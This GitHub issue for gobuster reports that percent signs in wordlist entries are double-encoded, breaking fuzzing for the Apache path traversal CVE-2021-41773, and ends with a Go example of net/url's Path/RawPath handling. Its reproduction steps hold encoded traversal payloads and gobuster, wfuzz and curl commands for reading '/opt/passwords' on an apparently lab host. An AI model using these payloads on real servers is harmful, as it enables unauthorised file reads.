Automatic encoding of percent sign #618

@plmi

Description

Hi,
I've noticed a weird behavior while fuzzing a directory traversal for CVE-2021-41773 (an Apache directory traversal).

Description:
It seems that the percent sign is automatically encoded using %25 resulting in failed fuzzing attempts.

My gobuster --version output. I'm running Kali 6.16.8-1kali1 in a UTM virtual machine on an M4 MacBook Pro.

gobuster version 3.8
Build info:
go      go1.24.4
path    github.com/OJ/gobuster
build   -buildmode=exe
build   -compiler=gc
build   -trimpath=true
build   DefaultGODEBUG=asynctimerchan=1,gotestjsonbuildtext=1,gotypesalias=0,httplaxcontentlength=1,httpmuxgo121=1,httpservecontentkeepheaders=1,multipathtcp=0,netedns0=0,panicnil=1,randseednop=0,rsa1024min=0,tls10server=1,tls3des=1,tlsmlkem=0,tlsrsakex=1,tlsunsafeekm=1,winreadlinkvolume=0,winsymlink=0,x509keypairleaf=0,x509negativeserial=1,x509rsacrt=0,x509usepolicies=0
build   CGO_ENABLED=1
build   GOARCH=arm64
build   GOOS=linux
build   GOARM64=v8.0

Steps to reproduce:

  • Use a wordlist with URL-encoded entries, e.g.:
%2e%2e/opt/passwords
%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords
  • Try those directories on the target:
gobuster fuzz -u http://192.168.187.16:80/cgi-bin/FUZZ -w /tmp/wordlist.txt -t 5 -b 404,403,400 --proxy http://127.0.0.1:8080

The attack did not find anything, although I knew that at least two of the paths were correct. I checked Burp and saw that the requested URLs are actually different.


It seems that the % sign is automatically encoded as %25, which is why my command failed. I would have expected the wordlist to be used as is, with behavior similar to curl --path-as-is http://192.168.187.16:80/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords.

I tried it again with wfuzz, and here the requests seem to be unchanged: no additional encoding of the % sign, and the attack finds the file.

wfuzz -c -z file,/tmp/wordlist.txt --hc 404 -p 127.0.0.1:8080:HTTP http://192.168.187.16:80/cgi-bin/FUZZ
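The following is an added example, not gobuster's code and not a statement about how gobuster builds its request URLs. It shows the net/url mechanism in Go's standard library that produces exactly the symptom above: a literal % in URL.Path is re-encoded as %25 unless URL.RawPath (or URL.Opaque) carries the pre-encoded form. The host and wordlist entry are taken from the report; the function names (naiveJoin, rawJoin, pathAsIs, requestLinePath) are mine.

```go
package main

import (
	"fmt"
	"net/url"
)

// Constructed inputs taken from the report above.
const base = "http://192.168.187.16:80/cgi-bin/"
const word = "%2e%2e/%2e%2e/opt/passwords" // wordlist entry, already URL-encoded

// naiveJoin appends the wordlist entry to URL.Path only. RawPath stays empty,
// so EscapedPath() re-escapes Path and every literal '%' becomes "%25".
// This reproduces the "%252e%252e" seen in the proxy.
func naiveJoin(base, word string) (string, error) {
	u, err := url.Parse(base)
	if err != nil {
		return "", err
	}
	u.Path += word
	return u.String(), nil
}

// rawJoin keeps the entry verbatim: Path holds the decoded form and RawPath the
// encoded form. EscapedPath() returns RawPath unchanged when the two agree, so
// the request line carries the original "%2e%2e".
func rawJoin(base, word string) (string, error) {
	u, err := url.Parse(base)
	if err != nil {
		return "", err
	}
	decoded, err := url.PathUnescape(word)
	if err != nil {
		// e.g. a '%' that is not followed by two hex digits; such an entry
		// cannot be represented via Path/RawPath and needs the Opaque route.
		return "", err
	}
	u.RawPath = u.EscapedPath() + word
	u.Path += decoded
	return u.String(), nil
}

// pathAsIs is the closest Go equivalent of `curl --path-as-is`: URL.Opaque is
// emitted by RequestURI() byte-for-byte, with no validation or re-escaping.
// Note that String() on such a URL is not meaningful; only the wire form is.
func pathAsIs(base, word string) (string, error) {
	u, err := url.Parse(base)
	if err != nil {
		return "", err
	}
	u.Opaque = u.EscapedPath() + word
	return u.RequestURI(), nil
}

// requestLinePath returns what net/http would put in the request line for a
// fully assembled URL, i.e. what an intercepting proxy such as Burp shows.
func requestLinePath(full string) (string, error) {
	u, err := url.Parse(full)
	if err != nil {
		return "", err
	}
	return u.RequestURI(), nil
}

func main() {
	for _, f := range []func(string, string) (string, error){naiveJoin, rawJoin, pathAsIs} {
		out, err := f(base, word)
		fmt.Printf("%q err=%v\n", out, err)
	}
}
```

Running it prints the double-encoded URL for naiveJoin and the untouched %2e%2e form for rawJoin and pathAsIs. A fuzzer that wants to honour an already-encoded wordlist has to populate RawPath (or Opaque) rather than Path alone; Path is defined as the decoded path, so anything placed there is escaped on output.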
